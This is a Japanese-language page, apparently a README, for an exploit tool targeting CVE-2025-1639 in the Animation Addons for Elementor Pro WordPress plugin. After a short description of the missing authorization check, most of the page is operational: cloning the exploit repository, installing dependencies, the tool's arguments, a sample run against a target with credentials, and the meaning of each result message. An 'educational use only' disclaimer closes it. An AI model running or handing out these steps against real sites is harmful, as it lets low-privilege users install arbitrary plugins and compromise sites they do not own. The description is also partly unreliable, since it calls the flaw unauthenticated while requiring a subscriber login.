
Animation Addons for Elementor Pro <= 1.6 - 認可欠如:認証済みユーザー(購読者以上)による任意のプラグインのインストール/有効化
WordPress用Animation Addons for Elementor Proプラグインは、バージョン1.6までの全バージョンにおいて、install_elementor_plugin_handler() 関数に対する機能チェックが欠如しているため、認証されていない任意のプラグインインストールが可能です。これにより、Subscriberレベルのアクセス権限以上を持つ認証済み攻撃者が、任意のプラグインをインストールして有効化することが可能になり、脆弱なサイトでElementorが有効化されていない場合、被害者をさらに感染させるために悪用される可能性があります。
requests ライブラリBeautifulSoup ライブラリgit clone https://github.com/Nxploited/CVE-2025-1639.git
cd CVE-2025-1639
pip install -r requirements.txt
usage: CVE-2025-1639.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2025-1639 # By Nxploit | Kaled ALenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to upload and activate (default: wp-maintenance-mode)
-u, --url: ターゲットURL-un, --username: WordPressユーザー名-p, --password: WordPressパスワード-pl, --plugin (任意): アップロードして有効化するプラグインスラッグ(デフォルト: wp-maintenance-mode)python CVE-2025-1639.py -u http://example.com/wordpress -un admin -p password -pl wp-maintenance-mode
Logged in successfully.: ログイン成功を示します。The site is vulnerable... Exploiting and uploading the plugin.: 対象サイトが脆弱であり、エクスプロイトとプラグインのアップロード中であることを示します。Plugin uploaded and activated successfully.: プラグインが正常にアップロードおよび有効化されたことを示します。Failed to log in.: ログイン失敗を示します。The site is not vulnerable.: 対象サイトが脆弱なバージョンを実行していないことを示します。Failed to extract security token.: 悪用に必要なセキュリティトークンの抽出に失敗したことを示します。Failed to upload and activate the plugin.: プラグインのアップロードと有効化に失敗したことを示します。このスクリプトは教育目的のみです。自己責任で使用してください。作者はこのスクリプトによって生じたいかなる損害についても責任を負いません。